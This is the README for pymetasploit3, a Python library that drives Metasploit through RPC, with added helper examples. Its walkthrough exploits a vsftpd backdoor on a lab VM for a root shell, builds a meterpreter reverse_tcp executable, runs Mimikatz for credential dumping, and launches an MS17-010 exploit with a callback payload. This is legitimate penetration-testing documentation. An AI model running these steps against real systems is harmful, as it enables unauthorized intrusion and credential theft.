Automation library for Metasploit

Pymetasploit3

Pymetasploit3 is a full-fledged Python3 Metasploit automation library. It can interact with Metasploit either through msfrpcd or the msgrpc plugin in msfconsole.

Original library: pymetasploit

This is an updated and improved version of the Python2 pymetasploit library by allfro.

Original project : https://github.com/allfro/pymetasploit

Installation

mkdir your-project
cd your-project
pipenv install --three pymetasploit3
pipenv shell

or:

pip3 install --user pymetasploit3

Basic Usage

Starting Metasploit RPC server

You can start the RPC server either with msfrpcd or from within msfconsole.

Msfconsole

This starts the RPC server on port 55552 alongside the Metasploit console UI:

$ msfconsole
msf> load msgrpc [Pass=yourpassword]

msfrpcd

This starts only the RPC server, on port 55553, running in the background:

$ msfrpcd -P yourpassword 

RPC client

Connecting to msfrpcd

>>> from pymetasploit3.msfrpc import MsfRpcClient
>>> client = MsfRpcClient('yourpassword', ssl=True)

Connecting to msfconsole with msgrpc plugin loaded

>>> from pymetasploit3.msfrpc import MsfRpcClient
>>> client = MsfRpcClient('yourpassword', port=55552, ssl=True)  # ssl must match the SSL option given to 'load msgrpc'

MsfRpcClient

The MsfRpcClient class provides the core functionality to navigate through the Metasploit framework. Use dir(client) to see the callable methods.

>>> [m for m in dir(client) if not m.startswith('_')]
['auth', 'authenticated', 'call', 'client', 'consoles', 'core', 'db', 'jobs', 'login', 'logout', 'modules', 'plugins',
'port', 'server', 'token', 'sessions', 'ssl', 'uri']
>>>

Like the metasploit framework, MsfRpcClient is segmented into different management modules:

  • auth: manages the authentication of clients for the msfrpcd daemon.
  • consoles: manages interaction with consoles/shells created by Metasploit modules.
  • core: manages the Metasploit framework core.
  • db: manages the backend database connectivity for msfrpcd.
  • modules: manages the interaction and configuration of Metasploit modules (i.e. exploits, auxiliaries, etc.)
  • plugins: manages the plugins associated with the Metasploit core.
  • sessions: manages the interaction with Metasploit meterpreter sessions.

Running an exploit

Explore exploit modules:

>>> client.modules.exploits
['windows/wins/ms04_045_wins', 'windows/winrm/winrm_script_exec', 'windows/vpn/safenet_ike_11',
'windows/vnc/winvnc_http_get', 'windows/vnc/ultravnc_viewer_bof', 'windows/vnc/ultravnc_client', ...
'aix/rpc_ttdbserverd_realpath', 'aix/rpc_cmsd_opcode21']
>>>

Create an exploit module object:

>>> exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
>>>

Explore exploit information:

>>> print(exploit.description)

          This module exploits a malicious backdoor that was added to the VSFTPD download
          archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
          June 30th 2011 and July 1st 2011 according to the most recent information
          available. This backdoor was removed on July 3rd 2011.

>>> exploit.options
['TCP::send_delay', 'ConnectTimeout', 'SSLVersion', 'VERBOSE', 'SSLCipher', 'CPORT', 'SSLVerifyMode', 'SSL', 'WfsDelay',
'CHOST', 'ContextInformationFile', 'WORKSPACE', 'EnableContextEncoding', 'TCP::max_send_size', 'Proxies',
'DisablePayloadHandler', 'RPORT', 'RHOSTS']
>>> exploit.missing_required # Required options which haven't been set yet
['RHOSTS']
>>>

Let's use a Metasploitable 2 instance running on a VMWare machine as our exploit target. It's running our favorite version of vsFTPd - 2.3.4 - and we already have our exploit module loaded. Our next step is to specify our target:

>>> exploit['RHOSTS'] = '172.16.14.145' # IP of our target host
>>>

Select a payload:

>>> exploit.targetpayloads()
['cmd/unix/interact']
>>>

At this point, this exploit only supports one payload (cmd/unix/interact). So let's pop a shell:

>>> exploit.execute(payload='cmd/unix/interact')
{'job_id': 1, 'uuid': '3whbuevf'}
>>>

We know the job ran successfully because job_id is 1. If the module failed to execute for any reason, job_id would be None. If we managed to pop our box, we might see something nice in the sessions list:

>>> client.sessions.list
{1: {'info': '', 'username': 'jsmith', 'session_port': 21, 'via_payload': 'payload/cmd/unix/interact',
'uuid': '5orqnnyv', 'tunnel_local': '172.16.14.1:58429', 'via_exploit': 'exploit/unix/ftp/vsftpd_234_backdoor',
'exploit_uuid': '3whbuevf', 'tunnel_peer': '172.16.14.145:6200', 'workspace': 'false', 'routes': '',
'target_host': '172.16.14.145', 'type': 'shell', 'session_host': '172.16.14.145', 'desc': 'Command shell'}}
>>>
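The dict returned by execute() and the entries in sessions.list share an identifier: a session's 'exploit_uuid' is the 'uuid' of the job that spawned it. The following is an added example, not code from pymetasploit3, that uses this to tell "the job never started" from "the job started but produced no session yet" instead of assuming the newest session is ours; the input dicts are copied from the output shown above.

```python
# Added example (not part of pymetasploit3): correlate the result of
# exploit.execute() with client.sessions.list via the job uuid. Inputs are
# copied from the README output above, so no live Metasploit is needed.

EXECUTE_RESULT = {'job_id': 1, 'uuid': '3whbuevf'}

SESSIONS = {
    1: {'type': 'shell', 'via_exploit': 'exploit/unix/ftp/vsftpd_234_backdoor',
        'exploit_uuid': '3whbuevf', 'session_host': '172.16.14.145',
        'tunnel_peer': '172.16.14.145:6200', 'desc': 'Command shell'},
}


def job_started(result):
    """True only if execute() actually queued a job (job_id is None on failure)."""
    return result is not None and result.get('job_id') is not None


def find_sessions_for_job(result, sessions):
    """Return {session_id: info} for every session spawned by this job."""
    if not job_started(result):
        return {}
    uuid = result['uuid']
    return {sid: info for sid, info in sessions.items()
            if info.get('exploit_uuid') == uuid}


def summarize(result, sessions):
    """One-line status a script can log instead of guessing from session count."""
    if not job_started(result):
        return 'module did not start (job_id is None)'
    found = find_sessions_for_job(result, sessions)
    if not found:
        return f"job {result['job_id']} started, no session yet"
    sid, info = next(iter(found.items()))
    return f"job {result['job_id']} -> session {sid} ({info['type']} on {info['session_host']})"
```

In a script, poll client.sessions.list for a few seconds after execute() and stop as soon as find_sessions_for_job() returns a match.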

Generate a payload

Create a payload module object:

payload = client.modules.use('payload', 'windows/meterpreter/reverse_tcp')

View module information as described above

Setting runoptions and generating the payload

# set runoptions
payload.runoptions['BadChars'] = ''
payload.runoptions['Encoder'] = ''
payload.runoptions['Format'] = 'exe'
payload.runoptions['NopSledSize'] = 0
payload.runoptions['ForceEncode'] = False
# payload.runoptions['Template'] = ''
payload.runoptions['Platform'] = ''
# payload.runoptions['KeepTemplateWorking'] = True
payload.runoptions['Iterations'] = 0

# payload_generate() returns str for text formats and bytes for binary ones
data = payload.payload_generate()
if isinstance(data, str):
    print(data)
else:
    with open('test.exe', 'wb') as f:
        f.write(data)

Interacting with the shell

Create a shell object out of the session number we found above and write to it:

>>> shell = client.sessions.session('1')
>>> shell.write('whoami')
>>> print(shell.read())
root
>>>

Run the same exploit object as before, but wait until it completes and gather its output:

>>> cid = client.consoles.console().cid # Create a new console and store its number in 'cid'
>>> print(client.consoles.console(cid).run_module_with_output(exploit, payload='cmd/unix/interact'))
# Some time passes
'[*] 172.16.14.145:21 - Banner: 220 vsFTPd 2.3.4
[*] 172.16.14.145:21 - USER: 331 Please specify the password
...'

client.sessions.session('1') has the same .write('some string') and .read() methods, but running a command in a session and waiting until it finishes is not as simple as with console commands. The RPC server can tell you whether a console is busy (client.consoles.console('1').is_busy() returns True or False), but there is no equivalent for a session, so completion has to be detected by hand. For this purpose run_with_output takes a list of strings; when any of them appears in the session's output, the command is considered done. Below we run the arp command in a meterpreter session. Its output is one block of text that contains the characters ---- when the command ran successfully, so we put that string into the list.

>>> session_id = '1'
>>> session_command = 'arp'
>>> terminating_strs = ['----']
>>> client.sessions.session(session_id).run_with_output(session_command, terminating_strs)
# Some time passes
'\nARP Table\n                  ---------------\n  ...'

Run a PowerShell script with output

>>> session_id = '1'
>>> psh_script_path = '/home/user/scripts/Invoke-Mimikatz.ps1'
>>> session = client.sessions.session(session_id)
>>> session.import_psh(psh_script_path)
>>> session.run_psh_cmd('Invoke-Mimikatz')
# Some time passes
'Mimikatz output...'

One can also set a timeout and simply return all data found before it expired. timeout defaults to Metasploit's comm timeout of 300s, and by default the call raises an exception when the command times out. To change this, set timeout_exception to False and the library will return whatever session output it collected before the timeout expired.

>>> session_id = '1'
>>> session_command = 'arp'
>>> terminating_strs = ['----']
>>> client.sessions.session(session_id).run_with_output(session_command, terminating_strs, timeout=10, timeout_exception=False)
# 10s pass
'\nARP Table\n                  ---------------\n  ...'
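To make the terminating-string and timeout behaviour described above concrete, here is an added, stand-alone re-implementation of that polling loop; it is not pymetasploit3's own code. The FakeSession class is a constructed stand-in that returns scripted chunks from read(), so the loop can be exercised offline; clock and sleep are injectable only so the timeout paths can be tested without waiting.

```python
# Added example (not pymetasploit3's own code): a stand-alone version of the
# completion check behind run_with_output(). A session has no is_busy(), so
# the caller polls read() and treats the command as finished once any of the
# terminating strings appears. FakeSession is a constructed stand-in so the
# loop runs offline; a real client.sessions.session(id) object exposes the
# same write()/read() calls.
import time


class SessionTimeout(Exception):
    """Raised when no terminating string arrives before the timeout."""


class FakeSession:
    """Constructed stand-in: hands back pre-scripted chunks, one per read()."""

    def __init__(self, chunks):
        self.chunks = list(chunks)
        self.written = []

    def write(self, data):
        self.written.append(data)

    def read(self):
        return self.chunks.pop(0) if self.chunks else ''


def run_with_output(session, command, terminating_strs, timeout=300,
                    timeout_exception=True, poll_interval=0.01,
                    clock=time.monotonic, sleep=time.sleep):
    """Send command, then collect read() output until a terminator is seen.

    If the timeout expires first, raise SessionTimeout (default) or, with
    timeout_exception=False, return whatever output was collected so far.
    """
    session.write(command)
    output = ''
    deadline = clock() + timeout
    while True:
        output += session.read()
        if any(t in output for t in terminating_strs):
            return output
        if clock() >= deadline:
            if timeout_exception:
                raise SessionTimeout(f'{command!r}: no terminator within {timeout}s')
            return output
        sleep(poll_interval)
```

Choose terminating strings that only appear once the command has fully finished; a string that occurs mid-output returns a truncated result without any error.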

Configuring payload options

For some use cases you might need to specify payload options; here is how to do so.

exploit = client.modules.use('exploit', 'windows/smb/ms17_010_psexec')
exploit['RHOSTS'] = '172.28.128.13'
payload = client.modules.use('payload', 'windows/meterpreter/reverse_tcp')
payload['LHOST'] = '172.28.128.1'
payload['LPORT'] = 4444
exploit.execute(payload=payload)

More examples

Many other usage examples can be found in the example_usage.py file.

Contributions

I highly encourage contributors to send in any and all pull requests or issues. Thank you to allfro for writing the original pymetasploit library.
